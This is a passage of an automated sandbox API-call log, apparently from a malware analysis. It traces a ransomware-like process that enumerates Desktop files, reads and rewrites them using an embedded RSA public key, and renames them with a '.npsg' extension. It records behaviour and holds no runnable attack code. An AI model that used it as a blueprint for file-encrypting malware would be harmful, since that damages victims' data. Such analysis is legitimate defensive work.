(HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.463] GetCurrentThreadId () returned 0x5b4 [0236.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0236.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400200 [0236.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34001a0 [0236.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0236.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34001b8 [0236.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400188 [0236.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400218 [0236.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34001e8 [0236.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34001d0 [0236.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400230 [0236.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001d0 | out: hHeap=0x620000) returned 1 [0236.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34001d0 [0236.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001e8 | out: hHeap=0x620000) returned 1 [0236.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001a0 | out: hHeap=0x620000) returned 1 [0236.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34001a0 [0236.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0236.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400200 | out: hHeap=0x620000) returned 1 [0236.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0236.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400230 | out: hHeap=0x620000) returned 1 [0236.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bb78 [0236.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0236.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0236.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001a0 | out: hHeap=0x620000) returned 1 [0236.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b7a060 [0236.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001d0 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400218 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001b8 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400188 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400170 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95398 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0236.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0236.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.468] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x25800, lpOverlapped=0x0) returned 1 [0236.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0236.469] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xd9400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.469] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cbd8 [0236.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b7a060 [0236.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b7a060, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0236.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b947f8 [0236.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cbd8 | out: hHeap=0x620000) returned 1 [0236.469] WriteFile (in: hFile=0x644, lpBuffer=0x3b947f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b947f8*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0236.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.469] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.469] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.470] CloseHandle (hObject=0x644) returned 1 [0236.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0236.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b8f7a8 [0236.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0236.486] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ythgrfed.exe.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ythgrfed.exe.exe.npsg")) returned 1 [0236.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.487] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68a920 | out: hHeap=0x620000) returned 1 [0236.490] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x987c3720, ftCreationTime.dwHighDateTime=0x1d5c4c0, ftLastAccessTime.dwLowDateTime=0x730f9080, ftLastAccessTime.dwHighDateTime=0x1d5ba44, ftLastWriteTime.dwLowDateTime=0x730f9080, ftLastWriteTime.dwHighDateTime=0x1d5ba44, nFileSizeHigh=0x0, nFileSizeLow=0x129c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Zyk83hZ.flv", cAlternateFileName="")) returned 1 [0236.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0236.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a920 [0236.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.491] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zyk83hZ.flv") returned=".flv" [0236.491] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Zyk83hZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zyk83hz.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.491] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=76225) returned 1 [0236.491] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.494] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1299b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.494] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.496] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.496] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x129c1, lpOverlapped=0x0) returned 1 [0236.497] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.497] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.497] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.497] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.498] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.498] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.498] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.498] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.498] GetLastError () returned 0x0 [0236.499] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.499] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.499] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.499] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.499] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x129c0) returned 0x3b95d50 [0236.499] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95398 [0236.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400170 [0236.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b953e0 [0236.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400188 [0236.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34001b8 [0236.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400218 [0236.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34001d0 [0236.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b8d7c0 [0236.500] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8f7a8 [0236.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001b8 | out: hHeap=0x620000) returned 1 [0236.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001d0 | out: hHeap=0x620000) returned 1 [0236.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400218 | out: hHeap=0x620000) returned 1 [0236.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.500] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400218 [0236.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0236.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34001d0 [0236.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0236.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34001b8 [0236.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0236.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0236.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0236.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0236.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001d0 | out: hHeap=0x620000) returned 1 [0236.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34001b8 | out: hHeap=0x620000) returned 1 [0236.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400218 | out: hHeap=0x620000) returned 1 [0236.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 